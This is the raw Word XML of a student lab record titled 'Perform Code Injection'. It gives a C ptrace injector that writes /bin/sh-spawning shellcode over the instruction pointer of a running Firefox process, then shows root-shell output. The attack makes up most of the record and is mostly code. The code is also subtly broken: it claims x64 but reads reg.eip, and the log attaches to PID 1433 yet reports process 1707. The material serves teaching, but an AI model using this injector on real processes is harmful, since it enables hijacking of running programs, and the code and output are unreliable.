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F3008" w14:textId="6AC58A54" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45AE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68354" wp14:editId="5C390927">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-314325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1009650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6419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92B1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45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPT NO:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                  ROLL NO: 2207012</w:t>
      </w:r>
      <w:r w:rsidR="007E6CE8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F29385" w14:textId="77777777" w:rsidR="002F13D5" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">  PERFORM CODE INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1255D1" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C73208B" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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7B46ABC" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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6F6F79E6" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="24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do process code injection on Firefox using ptrace system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A450F6" w14:textId="77777777"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C2B022" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="90"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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBB5C3" w14:textId="77777777"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out the pid of the running Firefox program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8B029" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="139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the code injection file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B0930" w14:textId="77777777"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 the pid of the Firefox from the command line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C2650" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="139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Allocate memory buffers for the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6CDE3" w14:textId="77777777"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Attach to the victim process with PTRACE_ATTACH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A455D00" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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 the register values of the attached process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D932D" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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PTRACE_POKETEXT to insert the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD41ECF" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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Detach from the victim process using PTRACE_DETACH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAEAF9C" w14:textId="77777777"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93C74B" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRP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PROGRAM CODE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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5156F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b/>
          <w:bCs/>
          <w:color w:val="980000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>INJECTOR PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24834ACE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&lt;stdio.h&gt;//C standard input output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9965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&lt;stdlib.h&gt;//C Standard General Utilities Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568F80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&lt;string.h&gt;//C string lib header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFBA0C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&lt;unistd.h&gt;//standard symbolic constants and types </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B913D37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&lt;sys/wait.h&gt;//declarations for waiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6658A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&lt;sys/ptrace.h&gt;//gives access to ptrace functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD20AAA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&lt;sys/user.h&gt;//gives ref to regs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F00A0D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//The shellcode that calls /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE7CF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char shellcode[]={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC4328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"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3916F2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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32225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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C256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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071359C1" w14:textId="77777777"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66EE39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lastRenderedPageBreak/>
        <w:t>//header for our program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDC18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void header()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6785E9B9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17645951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printf("----Memory bytecode injector-----\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC33C9B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7FF911B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112ACDF1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//main program notice we take command line options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322B4C47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int main(int argc,char**argv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219FC5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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2401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int i,size,pid=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D918BD2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struct user_regs_struct reg;//struct that gives access to registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADCCA2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                       //note that this regs will be in x64 for me </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90386C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                       //unless your using 32bit then rip,eax,edx etc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D14B59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char*buff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48444D1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header();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4DD77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//we get the command line options and assign them appropriately!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68511E2B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pid=atoi(argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF3B5B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size=sizeof(shellcode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94BC77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//allocate a char size memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F1A1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buff=(char*)malloc(size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68BDBE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//fill the buff memory with 0s upto size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4416B0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memset(buff,0x0,size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2730BC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//copy shellcode from source to destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39856B1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memcpy(buff,shellcode,sizeof(shellcode));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B616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//attach process of pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884576E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ptrace(PTRACE_ATTACH,pid,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AD47A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18562B08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//wait for child to change state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD9C29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wait((int*)0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CAAF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//get process pid registers i.e Copy the process pid's general-purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D75F9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//or floating-point registers,respectively, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AA429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//to the address reg in the tracer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F861E1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lastRenderedPageBreak/>
        <w:t>    ptrace(PTRACE_GETREGS,pid,0,&amp;reg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFDC4A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printf("Writing EIP 0x%x, process %d\n",reg.eip,pid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342DDC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//Copy the word data to the address buff in the process's memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742B511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for(i=0;i&lt;size;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35293999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ptrace(PTRACE_POKETEXT,pid,reg.eip+i,*(int*)(buff+i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993760E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7924B7E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//detach from the process and free buff memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AFD0F8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ptrace(PTRACE_DETACH,pid,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F06879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free(buff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4D480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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB93DF0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A21BD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3C3D2BBF" w14:textId="77777777"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C4214C" w14:textId="77777777" w:rsid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2C3E0B18" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRP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OUTPUT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14:paraId="633C712E" w14:textId="77777777"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[root@localhost ~]# vi injector.c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEED45" w14:textId="77777777"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[root@localhost ~]# gcc injector.c -o injector </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7137B3" w14:textId="77777777"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[root@localhost ~]#ps -e|grep firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B729A61" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="626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1433 ?</w:t>
      </w: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00:01:23 firefox [root@localhost ~]# ./injector 1433</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3699589A" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1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----Memory bytecode injector-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E8CBDC" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-810" w:right="5220" w:firstLine="5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Writing EIP 0x6, process 1707 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E18E71" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="5220" w:firstLine="5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[root@localhost ~]#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C223E85" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C55A5F" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3628B120" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521FDE75" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA6136F" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRDefault="00C45AE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1D445681" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="85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67769">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F67769">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The implementation of </w:t>
      </w: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process code injection on Firefox using ptrace system call</w:t>
      </w:r>
      <w:r w:rsidR="00F677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executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B749C9" w14:textId="77777777" w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidSect="00C45A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64636"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B092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169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EC"/>
    <w:rsid w:val="002F13D5"/>
    <w:rsid w:val="007E6CE8"/>
    <w:rsid w:val="00C45AEC"/>
    <w:rsid w:val="00D25D03"/>
    <w:rsid w:val="00F6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FD3E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9174EF1-EDD1-4B5E-A3B2-E6DBC4A4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4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Sanjay M</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-09T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-09T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>